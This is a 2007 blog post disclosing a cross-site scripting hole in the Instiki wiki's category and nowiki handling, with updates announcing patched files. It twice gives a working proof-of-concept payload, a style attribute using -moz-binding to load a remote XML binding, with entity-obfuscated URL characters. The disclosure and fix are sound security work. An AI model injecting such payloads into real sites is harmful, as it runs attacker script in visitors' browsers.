Skip to the Main Content

Note:These pages make extensive use of the latest XHTML and CSS Standards. They ought to look great in any standards-compliant modern browser. Unfortunately, they will probably look horrible in older browsers, like Netscape 4.x and IE 4.x. Moreover, many posts use MathML, which is, currently only supported in Mozilla. My best suggestion (and you will thank me when surfing an ever-increasing number of sites on the web which have been crafted to use the new standards) is to upgrade to the latest version of your browser. If that's not possible, consider moving to the Standards-compliant and open-source Mozilla browser.

September 2, 2007

XSS 2

How embarrassing!

Volker asked some pointed questions about the security of Instiki. I gamely tried to respond, and proffered that, among other things, Instiki has a pretty darned good XSS Sanitizer.

Well, that got me to thinking. A sanitizer is only effective on those things which it … well … sanitizes. Which prompted me to wonder: are there things which Instiki should be sanitizing, but isn’t?

Yup. Categories. Go to an unprotected Instiki wiki, edit a page and add the line

:category: <p style="-moz-binding:url('http://golem.ph.u&#x74;exas.edu/&#x7E;distler/blog/files/warning2.xml#xss')"></p>

When you save the page, nothing much seems amiss. But if you visit the “All Pages” or “Recently Revised” links, at the top of the page, in a Mozilla-based browser, you’ll be in for a delightful surprise.

Update (9/11/2007):

For even more immediate gratification, try inserting
<nowiki><p style="-moz-binding:url('http://golem.ph.u&#x74;exas.edu/&#x7E;distler/blog/files/warning2.xml#xss')"></p></nowiki>

Sheesh! On an unprotected Instiki installation <nowiki> means “no sanitize.”


If you’re running a copy of my branch of Instiki, update to the latest.

Update (9/23/2007):

I was finally granted commit access to the Instiki SVN repository, and uploaded the necessary patched files to the trunk.

If you’re still using the original version of Instiki, you should download

lib/sanitize.rb
lib/chunks/category.rb
lib/chunks/nowiki.rb
lib/chunks/chunk.rb
test/unit/chunks/category_test.rb
test/unit/chunks/nowiki_test.rb

Hopefully, Matthias will get a new release out the door, in the not-too-distant future.


I suppose this is not exactly going to bolster Volker’s confidence in the product. But I think I get good marks for fast turnaround.

Posted by distler at September 2, 2007 1:55 AM

TrackBack URL for this Entry:   http://golem.ph.utexas.edu/cgi-bin/MT-3.0/dxy-tb.fcgi/1415

0 Comments & 1 Trackback

Read the post svn+ssh:// and svnX
Weblog: Musings
Excerpt: svn+ssh HowTo
Tracked: September 27, 2007 10:32 AM

Post a New Comment